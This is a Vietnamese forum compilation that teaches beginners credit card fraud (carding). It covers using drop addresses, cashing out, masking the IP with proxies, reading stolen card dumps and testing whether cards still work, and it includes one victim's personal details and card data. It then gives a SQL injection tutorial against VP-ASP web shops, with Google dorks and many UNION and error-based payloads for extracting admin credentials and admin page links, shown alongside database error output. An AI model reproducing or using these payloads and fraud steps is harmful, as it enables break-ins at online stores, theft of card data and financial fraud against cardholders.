CÁC BÀI HỌC CƠ BẢN IT CC_CCV

Lời mở đầu
Các bài này được rút gọn tối đa, dùng từ ngữ cực kì gần gũi để cho newbabie
có thể dễ dàng tiếp cận.

Bài học đầu tiên

Mục đích sử dụng credit card?

Trích:
1 - Shipping:
- Là hình thức mua hàng trên mạng bằng credit card, sau đó gửi về Việt Nam
- Nhắc tới ship, người ta thường nhắc tới Dropper:
Nước ngoài nó khinh VN mình đếch thèm giao dịch và chuyển hàng. Vì vậy chúng ta cần DROP (có
nghĩa là 1 người sống ở nước ngoài nhận hàng giùm). Khi ship thì hàng được chuyển về địa chỉ của
DROP, sau đó chúng ta ăn chia với DROP.

2 - Mua các tài sản ảo và bán lại cho những người có nhu cầu:
Tài sản ảo ở đây là server, host, domain, thẻ gọi điện thoại quốc tế, đồ chơi xịn của game online...

3 - Cashout
Muốn cashout thì nói chung phải có chút kiến thức về các hệ thống tiền tệ (để qua mặt nó), hoặc là
học các kỹ thuật in thẻ ATM.

4 - Mua soft, mua tài khoản xxx, ebook ...

Bài học số 2:

Các điều kiện cần và đủ trước khi sử dụng credit card (CC)?

1. Khái niệm:

- Bởi vì chủ thực sự của CC là người nước ngoài (USA, UK, CANADA,...) nên ko thể nào chúng ta
ngồi ở VN mà sử dụng CC được.
- Mỗi máy tính khi truy cập vào internet đều được cấp cho 1 địa chỉ IP, nhớ địa chỉ IP mà người ta có
thể dễ dàng biết được bạn ở đâu?

Đó là 2 lý do chúng ta phải FAKE IP, sau khi FAKE IP thì máy tính của bạn sẽ thông qua 1 địa chỉ IP
ở USA, UK, ... để truy cập vào internet.

2. Phân loại:

Để cho dễ hiệu, ta chia làm 2 loại:

+ Sock
+ Proxy
Các bạn cứ yên tâm, tự khắc khi sử dụng các bạn sẽ biết được cái nào là sock, cái nào la proxy. Đơn
giản là vì khi tìm thấy chúng, ng ta đã ghi rõ sẵn là sock hay proxy
Nó sẽ có dạng như sau: 69.124.12.212:123 (69.124.12.212 là IP, 123 là PORT)

3. Kiểm tra Sock, Proxy còn sử dụng được hay không?

Có rất nhiều trang web giúp ta làm chuyện này, xin lấy VD 1 trang web khá tốt:
hxxp://www.checker.freeproxy.ru/checker/

5. Kiểm tra Sock, Proxy có phải là hàng tốt hay không?

hxxp://www.mxtoolbox.com/blacklists.aspx
Checking 67.185.248.54:1080 against 144 known blacklists...
Listed: 11 time(s)
Timeouts:5

Black List càng nhỏ thì có nghĩa là Sock, Proxy của chúng ta càng good. Trường hợp này blacklist
của chúng ta là 11.
4. Cách FAKE IP:

+ Proxy:
- Tools --> Interner Opition --> Connections --> LAN Settings
- Check vào Use a proxy server.....
- Điền proxy vào như hình dưới

+ Sock:
- Tools --> Interner Opition --> Connections --> LAN Settings
- Check vào Use a proxy server.....
- Chọn Advanced
- Điền sock vào như hình dưới
Bài học số 3

Cách đọc và hiểu 1 Credit Card

Một Number Card thường gồm có 16 chữ số, có loại có 13 chữ số.

1. Phân loại:

Trong đó, 4 chữ số đầu tiên thường quy định và là dấu hiệu nhận dạng bởi các tên của ngân hàng
phát hành Card đó

3xxx xxxx xxxx xxxx: Ameriacan Express Card

4xxx xxxx xxxx xxxx: Visa Card
5xxx xxxx xxxx xxxx: Master Card
6xxx xxxx xxxx xxxx: Discover Card

Đó là các ngân hàng phân loại. Còn chúng ta thì phân loại theo:

+ CC không có CVN (CVV): ko có "Card Verification Number", ít nhưng vẫn xài được loại này, thường
thì mua softwares...
+ CC có CVN (CVV): có Card Verification Number, có thể làm được rất nhiều chuyện như trong bài 1
đã liệt kê.
+ CC full info (có thêm login bank và Pin ATM): cái này dùng để cashout.

2. Cách đọc:

Thường CC sau khi hack từ Shop ra sẽ có dạng này:

13774/Carole/Kirner/8 Hunter Ct./Montgomery/IL/60538/US/kirner124@comcast.net/630-896-
7525/13774/60538/Carole Kirner/2/549123701563xxxx /12/6/799/

Lần đầu khó phân biệt, riết sẽ quen thôi:

+ First Name: Carole
+ Last Name: Kirner
+ Address: 8 Hunter Ct.
+ City: Montgomery
+ State: IL
+ Zipcode: 60538
+ Phone: 630-896-7525
+ CC Number: 549123701563xxxx
+ CVV: 799
+ Date Exp:12/6
Bài học số 4

Cách check CC xem live hay die?

Áp dụng bài 2 để FAKE IP, hiểu được các thông số của CC ở bài 3, bây giờ các bạn phải biết cách
kiểm tra xem CC đó còn dùng được nữa không. Có 2 phương pháp:

1. Đem đi dùng luôn, nếu CC live thì thành công luôn, còn nếu die thì bỏ, tìm CC khác, khỏi mắc
công check đi check lại lôi thôi. Nhưng nhớ mỗi lần FAIL thì các bạn nên clear cookie rồi hãy thử lại
bằng 1 con CC khác. Ko đâu check CC good bằng chỗ mình cần sử dụng CC.

2. Cẩn thận hơn, các bạn có thể check trước, rồi mới đi dùng. Mình khuyến khích dùng WALLET (đến
giờ mình vẫn dùng WALLET).

Tham khảo cách check tại WALLET ở đây:

Trích:
hxxp://www.viet4all.info/forum/showthread.php?t=2333

Cách hack shop cơ bản và nâng cao *!*

Bài này tui vừa tìm nên lên post cho ae lun Nếu ae thấy thì thank nha!! Để lần sau em pót tiếp .He
He

(Dành cho người đã có nắm kiến thức căn bản. Hack chỉ nhằm mục đích học hỏi và trau dồi kĩ năng
bảo mật.

Tác giả sẽ không chịu bất cứ trách nhiện nào nếu một ai đó sử dụng bài viết này với mục đích xấu)

(Tài liệu biên soạn dựa trên kinh nghiệm của tác giả và sưu tầm từ các nguồn tài nguyên trên iNet,
nếu đụng hàng của ai thì xin bỏ quá ^\^)

YM: jupiter_explorer | Nick: kakaka

I.Cách hack căn bản thứ nhất dựa vào lỗi SQL id=?' cat=?'

Công cụ tìm kiếm site lỗi: Google

Từ khóa tìm kiếm:
allinurl:"shopdisplayproducts.asp?id=

allinurl:"shopdisplayproducts.asp?id=1

allinurl:"shopdisplayproducts.asp?id=2

allinurl:".com/shopdisplayproducts.asp?id=

allinurl:".net/shopdisplayproducts.asp?id=

.asp?=catalogid=

.asp?cid=

alliurl: shop$.asp?$=

shopexd.asp?

shopreviewlist.asp?id=1
3. Thông thường ta thực hiện 3 giai đoạn sau:

Tìm UserName và PassAdmin

Tìm Link Admin
Tìm Pass 2 nếu có

Tìm Shop lỗi

Shop ví dụ: http://www.victim.com/shoping/shopdi...ducts.asp?id=5

Thêm dấu (') vào sau: http://www.victim.com/shoping/shopdisplayproducts.asp?id=5'

Báo lỗi :

Products

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ccategory = 1'
Order

By specialOffer DESC, cname'

./shopping/shop$db.asp, line 657

Nếu không thấy lỗi, thay id bằng cat:

http://www.victim.com/shoping/shopdisplayproducts.asp?cat=5'

Có lỗi rùi :

Microsoft JET database Engine error '80040e014'

Syntax error in query expression 'ccintcatalogid=p.catalogid and cc.intcategory=c.categoryid and

c.catdescription like'5%'

and hide=0 order by specialoffer DESC, cname'

./shopping/shop$db.asp, line 564

Chú ý khi về 2 trường hợp trên : (Quan trọng)

Nếu lỗi là id trong các truy vấn bên dưới không có dấu (') theo sau số id
Nếu lỗi là cat thì cần có thêm dấu (') theo sau trong các truy vấn bên dưới

Đối với lỗi do id: không có dấu (') trong các truy vấn

//////////Tìm username và pass Admin://////////

Thêm đoạn code này vào sau:

%20union select 1 from tbluser'

Ta được :

http://www.victim.com/shoping/shopdi...p?id=5%20union select 1 from tbluser'

Thông thường ta thêm: (có lẽ các bạn đã hiểu là vì sao nên không nói dài dòng nữa)
%20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from tbluser'

%20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47 from
tbluser'

Thêm cho đến khi nào xuất một trang bình thường và không còn báo lỗi nữa. Trên trang xuất hiện
mấy con số lạ. Thông thường là số 3, 4, 22, 18

Ta thay con số 3 bằng đoạn mã sau để lấy user và pass admin:

fldusername%2b'/'%2bfldpassword

Ta có được:

%20union select 1,2,fldusername%2b'/'%2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,1

7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from tbluser'

%20union select 1,2,fldusername%2b'/'%2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,1

7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47
from tbluser'

Số 3 bây giờ sẽ là: usernameadmin/passadmin

Ví dụ như : kakaka/maiyeuem

//////////Tìm link admin ://////////

Link mặc định là shopadmin.asp, shopadmin1.asp. Nếu không được thì đành tự kiếm !

Nó nằm tại bảng configuration. Vẫn giữ nguyên số cột mà bạn đã khai thác được, thay column đầu
bằng:

fieldname='xadminpage'

Thay column lỗi muốn hiển thị bằng:

fieldvalue (ở đây là số 3)

Ta được như sau (một trong hai):

%20union select fieldname='xadminpage',2,fieldvalue,4,5,6,7,8,9,10

,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37 from
configuration'

%20union select fieldname='xadminpage',2,fieldvalue,4,5,6,7,8,9,10

,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2
7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47 from configuration'

Chú ý: Có thể thay giá trị fieldvalue vào số 3, 4, hay 22 gì tùy bạn. Không bắc buộc là số 3 ! Theo ví
dụ này mình cho vô số 3 ^^

1 là bạn gặp 1 trang trên có mấy con số như : Page 1 of 10

Hãy cố gắng tìm trong 10 trang đó sẽ có 1 trang chứa link admin. Bạn tìm được các trang có đuôi
dạng *.asp

2 là bạn gặp thông báo lỗi:

The Microsoft Jet database engine cannot find the input table or query 'configuration'. Make sure it
exists and that its name is spelled correctly.

Hic...victim đã xóa mất bảng config và hết lấy link admin ! ^\^

//////////Tìm Pass 2://////////

Nếu bạn có link admin, nhưng shop này nó đòi cái pass 2 nữa ! Quỹ quái thật ^\^

Không có gì khó, nhưng bạn phải xem trang đó có bị lỗi tại page: shopexd.asp hay không, nếu
không kiếm pass 2 ngay !

Dùng đoạn code này:

shopexd.asp?id=1%20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

,21,22,23,24,25,26,fieldvalue,28,29,30,31,32,33,34 ,35,36,37 from configuration where field
name='xadminpage'

Hoặc:

shopexd.asp?id=1%20union select fieldname='xadminpage',2,3,4,5,6,7,8,9,10,11,12,13

,14,15,16,17,18,19,20,21,22,23,24,25,26,fieldvalue ,28,29,30,31,32,33,34,35,36,37 from
configuration'

Giả sử tại page này column 20 bị lỗi

Dùng code như khi kiếm link admin tại chỗ này:

%20union select fieldname='xadminpage',2,3,4,5,6,7,8,9,10,11,12,13

,14,15,16,17,18,19,fieldvalue,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37 from
configuration'

Rồi, nếu ok nó sẽ sổ ra mã nguồn asp của trang admin, và bạn sẽ nhìn thấy pass 2 tại dòng lênh:
Const SecondPassword="pass 2"

Tiếp, nếu bạn muốn tìm link admin tại page này thì phải dùng code sau:

%20union select fieldname='xadminpage',2,3,4,5,6,7,8,9,10,11,12,13

,14,15,16,17,18,19,left(fieldvalue,9),21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37 from
configuration'

Nếu nó vẫn ra mã nguồn, thì nghĩa là số kí tự của link admin nhỏ hơn 9 hoặc bằng 9, bạn thay 9
bằng số 7.

-> giả sử nó sẽ hiện ra thế này: shoa.as Nhìn thế này thì đủ biết link admin là gì rồi.

Còn nếu dùng code trên mà nó chưa hiện ra dấu . thì bạn chưa thể khẳng định được, thì hãy tăng
lên, thay 9 bằng 11 hoặc 12 v..v.... Cứ thế

Đối với lỗi do cat: có dấu (') trong các truy vấn

//////////Tìm username và pass Admin://////////

Thêm đoạn code này vào sau:

%20union select 1 from tbluser"having 1=1--sp_password

Ta được:

http://www.victim.com/shoping/shopdisplayproducts.asp?id=5'%20union select 1 from

tbluser"having 1=1--sp_password
Chú ý nó khác với id chỗ này: "having 1=1--sp_password và dấu (') phải có ở trước 20%union !

Thông thường ta thêm:

%20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from tbluser"having 1=1--sp_password

%20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47 from
tbluser"having 1=1--sp_password

Phần còn lại giống với phần hướng dẫn với id ở trên. Khác ở chỗ là có "having 1=1--sp_password ở
sau và dấu (') phải có ở trước 20%union !

%20union select 1,2,fldusername%2b'/'%2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,1

7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from tbluser"having 1=1--
sp_password

%20union select 1,2,fldusername%2b'/'%2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,1

7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47
from tbluser"having 1=1--sp_password

//////////Tìm link admin ://////////

Giống với phần hướng dẫn với id ở trên. Khác ở chỗ là có "having 1=1--sp_password ở sau và dấu
(') phải có ở trước 20%union !

%20union select fieldname='xadminpage',2,fieldvalue,4,5,6,7,8,9,10

,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37 from
configuration"having 1=1--sp_password

%20union select fieldname='xadminpage',2,fieldvalue,4,5,6,7,8,9,10

,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2
7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47 from configuration"having 1=1--
sp_password

//////////Tìm Pass 2://////////

Giống với phần hướng dẫn với id ở trên. Khác ở chỗ là có "having 1=1--sp_password ở sau và dấu
(') phải có ở trước 20%union !

%20union select fieldname='xadminpage',2,3,4,5,6,7,8,9,10,11,12,13

,14,15,16,17,18,19,fieldvalue,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37 from
configuration"having 1=1--sp_password

%20union select fieldname='xadminpage',2,3,4,5,6,7,8,9,10,11,12,13

,14,15,16,17,18,19,left(fieldvalue,9),21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37 from
configuration"having 1=1--sp_password

Nếu làm như cách này không được thì hãy thay các khoàng trắng bằng %20 và thêm %27 vào sau
tbluser hoặc configuration để thử lại ! (Bình thương thì trình duyệt tự nhận %20 là một khoảng
trắng và ngược lại) !

II.Cách hack căn bản thứ hai dựa vào lỗi SQL id=?' cat=?': ( Exploit các columns trong các tables
của database)

Công cụ tìm kiếm site lỗi: Google

Từ khóa tìm kiếm:
allinurl:"shopdisplayproducts.asp?id=
allinurl:"shopdisplayproducts.asp?id=1

allinurl:"shopdisplayproducts.asp?id=2

allinurl:".com/shopdisplayproducts.asp?id=

allinurl:".net/shopdisplayproducts.asp?id=

.asp?=catalogid=

.asp?cid=

alliurl: shop$.asp?$=

shopexd.asp?

shopreviewlist.asp?id=1

Bước 1 tương tự như trên:

Ví dụ site này:http://www.victimtim.com/shopping/shopdisplayproducts.asp?id=153'

Cũng thêm vào dấu phẩy ( ' ) để check lỗi

Products

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character
string ''

./shopping/shopdisplayproducts.asp, line 93

Oh có lỗi rồi, giờ sao đây

Cái này anh em biết khai thác chứ:

Lấy table đầu tiên của CSDL:

%20and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password

http://www.victimtim.com/shopping/sh...)--sp_password

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value
'ver_Faq' to a column of data typeint

./shopping/shopdisplayproducts.asp, line 93

Bước 2 chắc các bạn biết, chỉ là lấy table thui.

Sau đây là code lấy các table khác ngoài table đầu tiên, mình chỉ việc kiếm table nào chứa users của
admin là okie.

%20and 1=convert(int,(select top 1 table_name from information_schema.tables where

table_name not in ('ver_Faq')))--sp_password
%20and 1=convert(int,(select top 1 table_name from information_schema.tables where
table_name not in ('ver_Faq','coupons','customerprices','customers') ))--sp_password

http://www.victimtim.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(i
nt,(select%20top%201%20table_name%20from%20informa
tion_schema.tables%20where%20table_name%20not%20in
%20('ver_Faq','coupons','customerprices','customer s')))--sp_password

Products

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value
'AdminUsers' to a column of datatype int

./shopping/shopdisplayproducts.asp, line 93

Tới đây là đã quá rõ, cái mình tìm chính là table này : 'AdminUsers' vì sao vậy vì nó chứa user và
pass chắc.

Thui cứ khai thác thử.

Ta lấy column của table 'AdminUsers'

Dùng code sau:

%20and 1=convert(int,(select top 1 column_name from information_schema.columns where

table_name=('AdminUsers')))--sp_password

Khi thêm code xong sẽ như thế này:

http://www.victimtim.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(i
nt,(select%20top%201%20column_name%20from%20inform
ation_schema.columns%20where%20table_name=('AdminU sers')))--sp_password

Products

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value
'AdminID' to a column of data typeint

./shopping/shopdisplayproducts.asp, line 93

Và bước tiếp theo:

Tìm các columns khác trong table 'AdminUsers' nhưng khác 'AdminID'

Code :

%20and 1=convert(int,(select top 1 column_name from information_schema.columns where

table_name=('AdminUsers') and column_name not in ('AdminID')))--sp_password

Khi thêm code xong sẽ như thế này:

http://www.victimtim.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(i
nt,(select%20top%201%20column_name%20from%20inform
ation_schema.columns%20where%20table_name=('AdminU
sers')%20and%20column_name%20not%20in%20('AdminID' )))--sp_password

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login'
to a column of data type int

./shopping/shopdisplayproducts.asp, line 93

Và các bạn cứ tiếp tục thêm table vào:

http://www.victimtim.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(i
nt,(select%20top%201%20column_name%20from%20inform
ation_schema.columns%20where%20table_name=('AdminU
sers')%20and%20column_name%20not%20in%20('AdminID' ,'login')))--sp_password

http://www.victimtim.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(i
nt,(select%20top%201%20column_name%20from%20inform
ation_schema.columns%20where%20table_name=('AdminU
sers')%20and%20column_name%20not%20in%20('AdminID' ,'login','pwd')))--sp_password

Okie 2 thông tin quan trọng là 'login','pwd' đă xuất hiện giờ chỉ việc kiếm pass.

Code dùng để exploit 2 columns 'login'và 'pwd' để lấy user và pass trong table 'AdminUsers'

%20and 1=convert(int,(select top 1 login%2b'/'%2bpwd from AdminUsers))--sp_password

Khi thêm code xong sẽ như thế này:

http://www.victimtim.com/shopping/shopdisplayproducts.asp?id=153%20and%201=convert(i
nt,(select%20top%201%20login%2b'/'%2bpwd%20from%20AdminUsers))--sp_password

Products

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value
'admin/admin' to a column of datatype int

./shopping/shopdisplayproducts.asp, line 93

Hà hà..

user: admin

pass: admin

Bác admin của shop này không biết có bị gì không nữa

Sử dụng cách này các bạn có thể lấy được tấc cả các table trong batabase của shop. Từ đây lại hình
thành một cách mới để tìm link admin.

Mặc dù nói thì dễ vậy nhưng làm thì cần một thứ nữa, đó chính là lỗi file shopexd.asp ^^ . Nếu bạn
vào trang này bị lỗi thì có hy vọng lấy được link admin.

Dùng đoạn lệnh gộp sau đây:

http://www.victimtim.com/shoping/shopexd.asp?id=-1 union select

table1,fieldvalue,table2,table3,table4,table5,tabl e6,table7,table8,table9,table10,table11,table12,ta
ble13,configuration where fieldname='xadminpage' and catalogid=153

Sở dĩ ta phải cho id=-1 để ngắt lệnh SQL thứ nhất khi hợp nhất thì nó sẽ thực hiện lệnh SQL thứ
hai.

Thực hiện lệnh này xong ta sẽ có link admin ngay ^\^

Site VPASP sử dụng cơ sở dữ liệu SQL - Server thì quá dễ để khai thác như sau

http://www.victimtim.com/shoping/sho...es.asp?id=1and 1=convert(int,(select top 1

fldusername%2b'/'%2bfldpassword from tbluser))--sp_password

http://www.victimtim.com/shoping/sho...es.asp?id=1and 1=convert(int,(select top 1 fieldvalue from

configuration where fieldname='xadminpage'))--sp_password

Đối với cat=?' các bạn làm tương tự ( vận dụng sáng tạo từ bài viết trên ^\^)
__________________